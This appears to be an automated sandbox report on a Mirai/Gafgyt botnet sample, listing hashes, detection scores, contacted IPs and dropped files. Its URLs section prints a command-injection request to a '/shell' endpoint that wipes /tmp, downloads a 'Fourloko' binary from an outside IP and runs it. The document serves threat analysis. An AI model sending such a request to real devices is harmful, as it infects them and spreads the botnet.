
nSg5RM0w0d

Status: finished
Submission Time: 2022-01-14 23:48:18 +01:00
Malicious
Spreader
Trojan
Gafgyt Mirai

Comments

Tags

  • 32
  • elf
  • mirai
  • motorola

Details

  • Analysis ID:
    553468
  • API (Web) ID:
    920988
  • Analysis Started:
    2022-01-15 00:09:55 +01:00
  • Analysis Finished:
    2022-01-15 00:16:33 +01:00
  • MD5:
    5ba84075b6789440e97cb6095ad55c32
  • SHA1:
    19c16b64b5482561db39de26034459274b9dfb91
  • SHA256:
    65222b0aa3c9aa64a92d8c4aa20e664ff6a7049c8b70dac73d85794407a32ded
  • Technologies:

Engine: Joe Sandbox
Detection: malicious
Score: 100
System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines
Detection: malicious
Score: 24/43

IPs

IP (Country)

  • 67.254.189.11 (United States)
  • 83.20.191.39 (Poland)
  • 148.221.102.35 (Mexico)
  • 223.124.158.166 (China)
  • 47.171.224.192 (United States)
  • 118.212.117.45 (China)
  • 216.54.175.15 (United States)
  • 194.28.179.220 (Ukraine)
  • 101.32.48.92 (China)
  • 192.243.129.200 (United States)
  • 103.123.2.193 (Taiwan; Republic of China (ROC))
  • 67.220.186.99 (United States)
  • 190.76.228.209 (Venezuela)
  • 199.107.217.174 (United States)
  • 46.190.17.103 (Greece)
  • 34.61.9.98 (United States)
  • 200.95.19.78 (Mexico)
  • 169.199.161.126 (United States)
  • 147.110.180.178 (South Africa)
  • 52.94.98.4 (United States)
  • 133.232.125.48 (Japan)
  • 80.60.82.221 (Netherlands)
  • 121.227.88.55 (China)
  • 68.58.216.220 (United States)
  • 54.233.11.252 (United States)
  • 130.51.4.50 (Reserved)
  • 132.39.33.228 (United States)
  • 47.87.41.215 (United States)
  • 123.79.119.67 (China)
  • 69.65.111.10 (United States)
  • 67.46.64.246 (United States)
  • 182.184.108.188 (Pakistan)
  • 185.240.220.152 (Czech Republic)
  • 63.240.110.192 (United States)
  • 163.5.177.186 (France)
  • 166.76.52.137 (United States)
  • 139.140.222.34 (United States)
  • 62.20.16.13 (Sweden)
  • 192.141.163.66 (Brazil)
  • 71.104.168.123 (United States)
  • 95.221.124.215 (Russian Federation)
  • 41.110.164.253 (Algeria)
  • 185.118.141.131 (Turkey)
  • 90.119.126.11 (France)
  • 9.196.70.214 (United States)
  • 138.241.60.27 (United States)
  • 112.94.220.109 (China)
  • 86.182.64.238 (United Kingdom)
  • 146.104.244.64 (Netherlands)
  • 1.128.184.34 (Australia)
  • 169.37.91.35 (Switzerland)
  • 87.236.77.16 (France)
  • 38.21.173.197 (United States)
  • 40.15.158.90 (United States)
  • 63.58.17.229 (United States)
  • 98.228.221.112 (United States)
  • 70.230.219.247 (United States)
  • 43.205.251.248 (Japan)
  • 5.166.10.58 (Russian Federation)
  • 167.179.151.167 (Australia)
  • 190.10.105.51 (Costa Rica)
  • 88.16.182.166 (Spain)
  • 125.53.105.82 (Japan)
  • 146.122.54.110 (United States)
  • 131.251.226.21 (United Kingdom)
  • 88.245.81.179 (Turkey)
  • 104.214.224.221 (United States)
  • 52.49.15.231 (United States)
  • 50.114.10.124 (United States)
  • 168.225.157.89 (United States)
  • 73.105.34.11 (United States)
  • 106.216.185.226 (India)
  • 155.95.85.169 (United States)
  • 76.72.131.87 (United States)
  • 82.237.229.86 (France)
  • 99.136.89.88 (United States)
  • 86.75.124.223 (France)
  • 94.54.78.131 (Turkey)
  • 139.113.193.20 (Norway)
  • 213.110.25.60 (Russian Federation)
  • 186.195.5.248 (Brazil)
  • 156.215.141.86 (Egypt)
  • 52.84.92.177 (United States)
  • 182.189.25.137 (Pakistan)
  • 134.209.44.112 (United States)
  • 114.118.210.232 (China)
  • 142.224.201.64 (Canada)
  • 206.63.232.245 (United States)
  • 82.125.79.157 (France)
  • 163.8.122.9 (Australia)
  • 120.80.62.97 (China)
  • 110.244.101.120 (China)
  • 139.193.211.227 (Indonesia)
  • 17.157.3.229 (United States)
  • 69.212.49.41 (United States)
  • 113.112.4.109 (China)
  • 143.142.32.104 (United States)
  • 95.36.119.231 (Netherlands)
  • 85.122.137.62 (Romania)
  • 189.39.227.49 (Brazil)

Domains

Name (IP)

  • daisy.ubuntu.com (162.213.33.132)

URLs

Name

  • https://www.rsyslog.com
  • http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name (File Type)

  • /run/systemd/seats/.#seat0Cld9nQ (ASCII text)
  • /run/utmp (data)
  • /run/user/1000/pulse/pid (ASCII text)
  • /run/systemd/users/.#127yZpFSO (ASCII text)
  • /run/systemd/users/.#127yCudpO (ASCII text)
  • /run/systemd/users/.#127osndWP (ASCII text)
  • /run/systemd/users/.#127JxP4nS (ASCII text)
  • /run/systemd/users/.#1279T6QuP (ASCII text)
  • /run/systemd/seats/.#seat0vOH8GW (ASCII text)
  • /run/systemd/seats/.#seat0gW22XI (ASCII text)
  • /run/systemd/seats/.#seat0fPuBS5 (ASCII text)
  • /run/systemd/seats/.#seat0UP3koV (ASCII text)
  • /run/systemd/seats/.#seat0PGcmbf (ASCII text)
  • /var/cache/man/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /run/systemd/seats/.#seat00fP9dO (ASCII text)
  • /run/systemd/journal/streams/.#9:83229oJt8zp (ASCII text)
  • /run/systemd/journal/streams/.#9:83132oMUTyp (ASCII text)
  • /run/systemd/journal/streams/.#9:831209JNtqn (ASCII text)
  • /run/systemd/journal/streams/.#9:83119epQaxo (ASCII text)
  • /run/systemd/journal/streams/.#9:83106BcFoap (ASCII text)
  • /run/systemd/journal/streams/.#9:83021OcrCqd (ASCII text)
  • /run/systemd/journal/streams/.#9:82652M5jDnn (ASCII text)
  • /run/systemd/journal/streams/.#9:82651Incshm (ASCII text)
  • /run/systemd/journal/streams/.#9:82282x4gkdd (ASCII text)
  • /run/systemd/journal/streams/.#9:82281sw8yuf (ASCII text)
  • /var/cache/man/fr.ISO8859-1/index.db.oO9WYa (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/ja/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/it/index.db.OyRu9a (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/it/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/index.db.EUDhwa (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/id/index.db.Zd40Sd (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/id/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/hu/index.db.yksjkd (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/hu/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/fr/index.db.sUR25d (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/fr/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/fr.UTF-8/index.db.Y4hA8c (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/fr.UTF-8/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /run/systemd/journal/streams/.#9:82280Xpi0tf (ASCII text)
  • /var/cache/man/fr.ISO8859-1/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/fi/index.db.WVQHwc (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/fi/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/es/index.db.cn8Gbb (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/es/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/de/index.db.S3TEtc (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/de/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/da/index.db.77D2Mb (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/da/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/cs/index.db.bmsf99 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /var/cache/man/cs/5237 (GNU dbm 1.x or ndbm database, little endian, 64-bit)
  • /run/systemd/journal/streams/.#9:76811qH7pMy (ASCII text)
  • /run/systemd/journal/streams/.#9:77767hdajY5 (ASCII text)
  • /run/systemd/journal/streams/.#9:77751uetbi3 (ASCII text)
  • /run/systemd/journal/streams/.#9:77736zKgEu3 (ASCII text)
  • /run/systemd/journal/streams/.#9:77735JHXZJ4 (ASCII text)
  • /run/systemd/journal/streams/.#9:77734UpxPL4 (ASCII text)
  • /run/systemd/journal/streams/.#9:77386zbV07x (ASCII text)
  • /run/systemd/journal/streams/.#9:773819KFhnz (ASCII text)
  • /run/systemd/journal/streams/.#9:77350SauDfx (ASCII text)
  • /run/systemd/journal/streams/.#9:77349IVOduw (ASCII text)
  • /run/systemd/journal/streams/.#9:77322OsWbkA (ASCII text)
  • /run/systemd/journal/streams/.#9:76990m2l7zx (ASCII text)
  • /run/systemd/journal/streams/.#9:76939jGjApA (ASCII text)
  • /run/systemd/journal/streams/.#9:77786au6FZ5 (ASCII text)
  • /run/systemd/journal/streams/.#9:76810F4S0kw (ASCII text)
  • /run/systemd/journal/streams/.#9:76798vzf3xx (ASCII text)
  • /run/systemd/journal/streams/.#9:76694UkHCiz (ASCII text)
  • /run/systemd/journal/streams/.#9:75969qyDlHy (ASCII text)
  • /run/systemd/journal/streams/.#9:75722SiuR1v (ASCII text)
  • /run/systemd/journal/streams/.#9:75719FgcSNy (ASCII text)
  • /run/systemd/journal/streams/.#9:75514O1H8Qy (ASCII text)
  • /run/systemd/journal/streams/.#9:75513yTxkyw (ASCII text)
  • /run/gdm3.pid (ASCII text)
  • /proc/5530/oom_score_adj (very short file (no magic))
  • /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source (ASCII text)
  • /run/systemd/journal/streams/.#9:80225Kko1GH (ASCII text)
  • /run/systemd/journal/streams/.#9:82200Mmg8de (ASCII text)
  • /run/systemd/journal/streams/.#9:81419DgoJHw (ASCII text)
  • /run/systemd/journal/streams/.#9:81410JMEOZv (ASCII text)
  • /run/systemd/journal/streams/.#9:80895csWzRe (ASCII text)
  • /run/systemd/journal/streams/.#9:80890kXpEjc (ASCII text)
  • /run/systemd/journal/streams/.#9:80889vcC1wb (ASCII text)
  • /run/systemd/journal/streams/.#9:8087408eiNb (ASCII text)
  • /run/systemd/journal/streams/.#9:80872ZsDYad (ASCII text)
  • /run/systemd/journal/streams/.#9:80768PNEHie (ASCII text)
  • /run/systemd/journal/streams/.#9:80766R2Khpf (ASCII text)
  • /run/systemd/journal/streams/.#9:80227tRyzgH (ASCII text)
  • /run/systemd/journal/streams/.#9:80226gFRKaF (ASCII text)
  • /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink (ASCII text)
  • /run/systemd/journal/streams/.#9:80210crg9BE (ASCII text)
  • /run/systemd/journal/streams/.#9:802066GpLmH (ASCII text)
  • /run/systemd/journal/streams/.#9:80205eJNuYE (ASCII text)
  • /run/systemd/journal/streams/.#9:80204BgANnG (ASCII text)
  • /run/systemd/journal/streams/.#9:80203qa2yGF (ASCII text)
  • /run/systemd/journal/streams/.#9:80202TiclRI (ASCII text)
  • /run/systemd/journal/streams/.#9:80201A3MprE (ASCII text)
  • /run/systemd/journal/streams/.#9:80198tlEzBH (ASCII text)
  • /run/systemd/journal/streams/.#9:77841sR2tbA (ASCII text)
  • /run/systemd/journal/streams/.#9:77790f7UV12 (ASCII text)
  • /run/systemd/journal/streams/.#9:77789HrwWM2 (ASCII text)